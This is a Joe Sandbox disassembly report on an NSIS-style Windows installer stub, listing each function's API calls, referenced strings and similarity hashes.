ShowWindow.USER32(?,0000000A), ref: 00404157

Strings

&B, xrefs: 00403FFB

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID: &B
API String ID: 184305955-3208460036
Opcode ID: 7cbc7830e6f4af9eeab0957ba226e6b71e67b9927e797dbb4650133cf52de542
Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
Opcode Fuzzy Hash: 7cbc7830e6f4af9eeab0957ba226e6b71e67b9927e797dbb4650133cf52de542
Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E

Function 0040391F Relevance: 42.2, APIs: 15, Strings: 9, Instructions: 216stringregistrylibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062C4
Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062CF
Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0

lstrcatW.KERNEL32(00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800,76233420,00000000,00434000), ref: 004039A0
lstrlenW.KERNEL32(004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800), ref: 00403A20
lstrcmpiW.KERNEL32(00427198,.exe,004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
GetFileAttributesW.KERNEL32(004271A0), ref: 00403A3E
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403A87

Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C

RegisterClassW.USER32(004281A0), ref: 00403AC4
SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403ADC
CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
ShowWindow.USER32(00000005,00000000), ref: 00403B47
LoadLibraryW.KERNEL32(RichEd20), ref: 00403B58
LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
RegisterClassW.USER32(004281A0), ref: 00403B89
DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8

Strings

RichEdit, xrefs: 00403B7A
.DEFAULT\Control Panel\International, xrefs: 0040398B
_Nb, xrefs: 00403AA3, 00403B0B
RichEd32, xrefs: 00403B5E
RichEdit20W, xrefs: 00403B6B, 00403B71
RichEd20, xrefs: 00403B53
Control Panel\Desktop\ResourceLocale, xrefs: 00403953
.exe, xrefs: 00403A2D
&B, xrefs: 0040394B

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
API String ID: 914957316-1918744475
Opcode ID: da30a9c0db2d4db67001de93ddcc73e1ef45d51233dd8672779a7638217d6adb
Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
Opcode Fuzzy Hash: da30a9c0db2d4db67001de93ddcc73e1ef45d51233dd8672779a7638217d6adb
Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D

Function 00404337 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
GetDlgItem.USER32(?,?), ref: 004043E9
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
GetSysColor.USER32(?), ref: 00404417
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
lstrlenW.KERNEL32(?), ref: 00404438
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
GetDlgItem.USER32(?,0000040A), ref: 004044B3
SendMessageW.USER32(00000000), ref: 004044BA
GetDlgItem.USER32(?,?), ref: 004044E5
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
LoadCursorW.USER32(00000000,00007F02), ref: 00404536
SetCursor.USER32(00000000), ref: 00404539
ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
SetCursor.USER32(00000000), ref: 0040455D
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
SendMessageW.USER32(?,00000000,00000000), ref: 0040459E

Strings

N, xrefs: 004044D3
open, xrefs: 00404546

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: N$open
API String ID: 3615053054-904208323
Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
Instruction ID: 8b9c65ccee0929ae2cd37a550bbe3266d1c56d3aba5277cbe5cc7d17fb3eae84
Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
Instruction Fuzzy Hash: 19718FB1A00209FFDB109F60DD85A6A7BA9FB94354F00853AFB01B62D1C778AD51CF99

Function 00405C66 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C76
CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C9A
GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3

Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B

GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
wsprintfA.USER32 ref: 00405CDE
GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,?,00426588,?,?,?,?,?), ref: 00405D19
GlobalAlloc.KERNEL32(?,0000000A), ref: 00405D28
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
GlobalFree.KERNEL32(00000000), ref: 00405DCF
CloseHandle.KERNEL32(00000000), ref: 00405DD6

Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA

Strings

%ls=%ls, xrefs: 00405CD4
NUL, xrefs: 00405C70
[Rename], xrefs: 00405D48, 00405D5A

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
String ID: %ls=%ls$NUL$[Rename]
API String ID: 1265525490-899692902
Opcode ID: 7d53d5cdfc02749ad00d931577bac562460a5dc9187a855172881db6ba44cc92
Instruction ID: 10a6a65bcc8db41326b0965a868e5b78be2cc6b43571d182478210b5aa6aebd6
Opcode Fuzzy Hash: 7d53d5cdfc02749ad00d931577bac562460a5dc9187a855172881db6ba44cc92
Instruction Fuzzy Hash: E941FE71604A18BFD2206B61AC4CF6B3A6CEF45714F24443BB901B62D2EA78AD018A7D

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00428200,000000FF,00000010,?), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5

Function 00404635 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 265stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404684
SetWindowTextW.USER32(00000000,?), ref: 004046AE
SHBrowseForFolderW.SHELL32(?), ref: 0040475F
CoTaskMemFree.OLE32(00000000), ref: 0040476A
lstrcmpiW.KERNEL32(004271A0,004226E8,00000000,?,?), ref: 0040479C
lstrcatW.KERNEL32(?,004271A0), ref: 004047A8
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA

Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,?,004047F1), ref: 0040571B

Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 0040623F
Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
Part of subcall function 004061DC: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406253
Part of subcall function 004061DC: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406266

GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F

Strings

A, xrefs: 00404758
&B, xrefs: 00404732

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A$&B
API String ID: 2246997448-2586977930
Opcode ID: 721fa909628c388d9eed4d059dc136074f5db6b4ff511665bfd1b1201094e888
Instruction ID: 6e37369fe6ef7f71d764005b1086c215e28ed7130f32df1ae996be3c53d44702
Opcode Fuzzy Hash: 721fa909628c388d9eed4d059dc136074f5db6b4ff511665bfd1b1201094e888
Instruction Fuzzy Hash: A79170F1900219EBDB10AFA1DC85AAF77B8EF85714F10443BF601B62D1D77C9A418B69

Function 00402DBC Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 203memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402DD0
GetModuleFileNameW.KERNEL32(00000000,00437800,?), ref: 00402DEC

Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E35
GlobalAlloc.KERNEL32(?,00409230), ref: 00402F7C

Strings

Error launching installer, xrefs: 00402E0C
Inst, xrefs: 00402EA3
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
Null, xrefs: 00402EB5
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
soft, xrefs: 00402EAC

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-787788815
Opcode ID: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
Instruction ID: b2cc58b1aa553f56ba66d3b0850f03698e33e3340d89f7fe3e9d1fe3a0eb5287
Opcode Fuzzy Hash: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
Instruction Fuzzy Hash: 43610371941205ABDB209FA4DD85B9E3BB8EB04354F20447BF605B72D2C7BC9E418BAD

Function 00405F6A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 207stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 0040602D
GetSystemDirectoryW.KERNEL32(004271A0,?), ref: 004060AB
GetWindowsDirectoryW.KERNEL32(004271A0,?), ref: 004060BE
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
SHGetPathFromIDListW.SHELL32(?,004271A0), ref: 00406108
CoTaskMemFree.OLE32(?), ref: 00406113
lstrcatW.KERNEL32(004271A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
lstrlenW.KERNEL32(004271A0,00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 00406191

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406131
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406079

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-730719616
Opcode ID: e03ee4e1462f3c7bda9b94e6fe8d7db5edd62b66dd87b3b0d45524ad71c1dce3
Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
Opcode Fuzzy Hash: e03ee4e1462f3c7bda9b94e6fe8d7db5edd62b66dd87b3b0d45524ad71c1dce3
Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E

Function 00404201 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040421E
GetSysColor.USER32(00000000), ref: 0040423A
SetTextColor.GDI32(?,00000000), ref: 00404246
SetBkMode.GDI32(?,?), ref: 00404252
GetSysColor.USER32(?), ref: 00404265
SetBkColor.GDI32(?,?), ref: 00404275
DeleteObject.GDI32(?), ref: 0040428F
CreateBrushIndirect.GDI32(?), ref: 00404299

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65

Function 00402573 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 00402616
SetFilePointer.KERNEL32(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402639
MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 0040264F

Part of subcall function 00405C37: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B

Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C

Strings

9, xrefs: 004025BE

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: File$ByteCharMultiReadWide$Pointerwsprintf
String ID: 9
API String ID: 1149667376-2366072709
Opcode ID: 13182ff9c3515e99dde9a7f361e17df10afd981257497e4f41ca39f28698b78d
Instruction ID: 34008a6f5bb5370994306dbe4266d00811a1d2e87b5126a94146f67fdcf6739f
Opcode Fuzzy Hash: 13182ff9c3515e99dde9a7f361e17df10afd981257497e4f41ca39f28698b78d
Instruction Fuzzy Hash: 0E51E771E04209ABDF24DF94DE88AAEB779FF04304F50443BE511B62D0D7B99A42CB69

Function 004027E5 Relevance: 10.6, APIs: 7, Instructions: 75memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA

GlobalAlloc.KERNEL32(?,?), ref: 00402809
CloseHandle.KERNEL32(?), ref: 0040288F

Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D

GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 00402825
GlobalFree.KERNEL32(?), ref: 0040285E
WriteFile.KERNEL32(?,00000000,?,?), ref: 00402870
GlobalFree.KERNEL32(00000000), ref: 00402877

Part of subcall function 00403062: SetFilePointer.KERNEL32(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
Part of subcall function 00403062: WriteFile.KERNEL32(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,?,?,00000000,00000000,?,?), ref: 00403115

DeleteFileW.KERNEL32(?), ref: 004028A3

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: File$Global$AllocFreePointerWrite$AttributesCloseCreateDeleteHandle
String ID:
API String ID: 64603807-0
Opcode ID: 0ae5610b60e6d4e17f9dac3ea963c7d8fcfadd954a58792ee9e4497ece00f648
Instruction ID: 618f9bc0fb3bf7a155370674c03f3081ddbeebb813ad2def4b435a70289f4265
Opcode Fuzzy Hash: 0ae5610b60e6d4e17f9dac3ea963c7d8fcfadd954a58792ee9e4497ece00f648
Instruction Fuzzy Hash: D4215C72C00118BFDF11AFA4CD89CAE7E79EF08364B14463AF5147A2E0C6795E419BA9

Function 004051F2 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 3b277214ccb200348dce810b6065f154b0d7733336d6f52acf236ebd4cfd95e9
Instruction ID: 09d17c59ce7287a2cbf3dc662f19c44123261f726eb293d34c68041fb2ac0666
Opcode Fuzzy Hash: 3b277214ccb200348dce810b6065f154b0d7733336d6f52acf236ebd4cfd95e9
Instruction Fuzzy Hash: CA21A131900558BBCB219FA5DD849DFBFB8EF54310F14807AF904B62A0C3798A81CFA8

Function 00402D1A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000), ref: 00402D35
GetTickCount.KERNEL32 ref: 00402D53
wsprintfW.USER32 ref: 00402D81

Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD

CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
ShowWindow.USER32(00000000,00000005), ref: 00402DB3

Part of subcall function 00402CFE: MulDiv.KERNEL32(?,?,?), ref: 00402D13

Strings

... %d%%, xrefs: 00402D7B

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

